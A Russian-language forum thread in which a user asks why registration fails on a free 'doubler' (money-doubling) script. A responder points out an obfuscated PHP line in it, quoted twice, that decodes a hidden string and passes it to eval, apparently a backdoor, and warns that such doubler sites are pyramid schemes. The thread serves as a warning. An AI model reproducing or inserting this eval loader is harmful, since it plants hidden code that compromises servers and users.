ПРОБЛЕМА не получается регистрация

  • Автор темы Kabus
  • Дата начала
Kabus
Местный
Сообщения
40
Реакции
0
Всем привет. Я установил скрипт на хостинге все сделаю. Попробовал многие скрипты. Всегда получается так.для регистрация нужно написат пайер, напишу и попал на базу но меня не открывается. Только покажет индекс.
 
pligin
Участник
Сообщения
3.654
Реакции
1.336
Telegram
pligin
Kabus написал(а):
Всем привет. Я установил скрипт на хостинге все сделаю. Попробовал многие скрипты. Всегда получается так.для регистрация нужно написат пайер, напишу и попал на базу но меня не открывается. Только покажет индекс.
Какой скрипт?
 
Kabus
Местный
Сообщения
40
Реакции
0
Скрипт удвоитель.
 
pligin
Участник
Сообщения
3.654
Реакции
1.336
Telegram
pligin
Kabus написал(а):
Скрипт удвоитель.
Какой? Он есть на форуме? Если есть, то пиши в обсуждении к скрипту. Если скрипта на форуме нет, то выложи его в ресурсы форума и в обсуждении к нему задавай вопросы.
Мы не экстрасенсы - нам нужно видеть скрипт
 
Kabus
Местный
Сообщения
40
Реакции
0
Хорошо.
 
Kabus
Местный
Сообщения
40
Реакции
0
скрипт это.
 

Вложения

Kabus
Местный
Сообщения
40
Реакции
0
может быть я сделал неправильно
 
Leroi
Местный
Сообщения
205
Реакции
92
  • #12
скинь ссылку на рабочий проект ,пребегу на винду посмотрю
 
Leroi
Местный
Сообщения
205
Реакции
92
  • #14
выкинь его нахрен говно дырявое ,енто говно изначально из эд скрипта натыкали дырами а теперь разбрасывают везде под скачку ,$FJfQnI='Sy1LzNFQiXd3DYkuLU6M1bQGAA==';$rxuopa=';)))VaDsWS$(rqbprq_46rfno(rgnysavmt(ynir';$DKiXlV=strrev($rxuopa);$tWCSiA=str_rot13($DKiXlV);eval($tWCSiA); это первая хрень на которую нужно было обратить внимание ,чего ты не сделал и решил на холяву содрать бабла ,только тебя бы обули пока ты думал бы что счас накрутишь миллионы, и с сайта где ты скачал ентое говно не лей сюда ,не давай дэбилам сливать бабло у нормальных людей ! не ужели так жалко 1000 рублей на целый скрипт ,что готовы просрать больше ?поражают такие люди но как то Вас очень много становиться
 
Kabus
Местный
Сообщения
40
Реакции
0
  • #15
Leroi написал(а):
выкинь его нахрен говно дырявое ,енто говно изначально из эд скрипта натыкали дырами а теперь разбрасывают везде под скачку ,$FJfQnI='Sy1LzNFQiXd3DYkuLU6M1bQGAA==';$rxuopa=';)))VaDsWS$(rqbprq_46rfno(rgnysavmt(ynir';$DKiXlV=strrev($rxuopa);$tWCSiA=str_rot13($DKiXlV);eval($tWCSiA); это первая хрень на которую нужно было обратить внимание ,чего ты не сделал и решил на холяву содрать бабла ,только тебя бы обули пока ты думал бы что счас накрутишь миллионы, и с сайта где ты скачал ентое говно не лей сюда ,не давай дэбилам сливать бабло у нормальных людей !
а что я буду делать?
 
Leroi
Местный
Сообщения
205
Реакции
92
  • #16
Kabus написал(а):
а что я буду делать?
а что ты хочешь делать ?удали скрипт с хоста и поменяй все пароли
 
Kabus
Местный
Сообщения
40
Реакции
0
  • #17
Leroi
Местный
Сообщения
205
Реакции
92
  • #18
Kabus написал(а):
Я хочу создать честный удвоитель.
) честный ) не смеши ,ты такой видел ? купи нормальный скрипт и работай ,не скачивай без платно !
 
Kabus
Местный
Сообщения
40
Реакции
0
  • #19
Leroi написал(а):
) честный ) не смеши ,ты такой видел ? купи нормальный скрипт и работай ,не скачивай без платно !
Да ты прав.я ещё не видел.по этому хочу сделать этого первый. И я буду сделать. Конечно если вы помогаете :))
 
Leroi
Местный
Сообщения
205
Реакции
92
  • #20
Kabus написал(а):
Да ты прав.я ещё не видел.по этому хочу сделать этого первый. И я буду сделать. Конечно если вы помогаете :))
много таких было честных ,когда просрешь бабло тогда поймешь что честный только тот кто свое нагреб ,как блян пирамида может быть честной ? ей один фиг нужно лопнуть ,вопрос только админ понимает что делает или нет ,если отдает отчет и понимает к чему ведет развитие проекта может и получиться игра ,а ннет ,так ннет )
 
Сверху